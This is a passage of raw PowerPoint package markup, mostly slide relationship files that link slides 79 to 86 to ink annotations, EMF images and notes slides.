Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink574.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink578.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide79.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2411.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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60.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink571.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2450.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink568.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink573.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink577.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2380.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink575.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2350.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink570.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2400.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image244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0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80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink588.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2650.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink600.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink608.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image328.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink581.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink612.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide80.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2520.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink591.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink583.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2560.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2600.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink595.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2640.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink599.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink603.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2570.emf"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image327.emf"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image331.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink580.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink607.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink587.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2550.emf"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2590.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink594.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink598.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2681.emf"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2721.emf"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2751.emf"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink611.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2480.emf"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink602.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image330.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink579.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2500.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink586.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink590.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink593.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2630.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2671.emf"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink606.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink610.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2540.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink597.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2711.emf"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2741.emf"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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70.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink585.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink589.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2580.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2620.emf"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink601.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink605.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2490.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink592.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2661.emf"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2701.emf"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2731.emf"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink609.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink613.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2460.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink582.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink584.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2530.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink596.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.emf"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2691.emf"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink604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70.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink618.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2720.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink614.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink622.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink615.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2690.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink620.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide81.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image276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60.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink617.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image332.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink619.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink623.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2680.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink621.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink616.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2700.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2771.e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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink629.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2800.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image284.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink624.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink633.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image334.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink626.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2770.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink631.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink638.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide82.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2790.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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40.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink628.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image333.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink625.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink630.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink634.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image283.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2760.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink632.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink637.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2730.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink627.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2780.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image282.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink635.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image285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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink644.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2950.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink639.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink648.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink641.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image288.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink646.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink650.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide83.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2900.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2920.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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50.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink643.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2940.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink640.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink645.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink649.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2961.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2870.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink647.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink653.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2840.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink642.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2890.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2930.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink651.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2971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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink659.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3030.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3071.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink654.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink663.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink656.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3000.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink661.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink665.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide84.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3020.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image304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70.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink658.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image306.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink655.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink660.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink664.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image336.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2990.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink662.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2960.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink657.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3050.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink666.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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672.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3140.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3180.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink685.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink676.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3221.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3261.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink689.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink669.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide85.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image313.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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80.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink671.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3170.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3211.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink684.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3251.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink688.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink668.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink673.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink677.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3191.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3231.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3100.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink675.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink681.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3271.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3070.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink670.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3120.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3160.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink679.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3201.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink683.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink687.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3090.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink667.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink674.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink678.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink682.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3241.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3281.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3150.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink68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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink695.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3260.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image338.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink690.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink699.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink692.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3230.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink697.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink701.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide86.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3250.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 